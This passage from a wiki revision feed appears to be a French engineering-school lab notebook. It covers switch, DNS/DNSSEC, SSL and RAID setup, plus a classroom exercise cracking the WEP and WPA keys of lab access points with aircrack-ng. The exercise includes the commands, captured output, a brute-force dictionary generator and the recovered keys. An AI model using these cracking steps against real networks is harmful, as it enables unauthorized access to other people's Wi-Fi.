&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35771</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35771"/>
				<updated>2016-12-08T14:17:18Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35770</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35770"/>
				<updated>2016-12-08T13:58:53Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation du site via certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
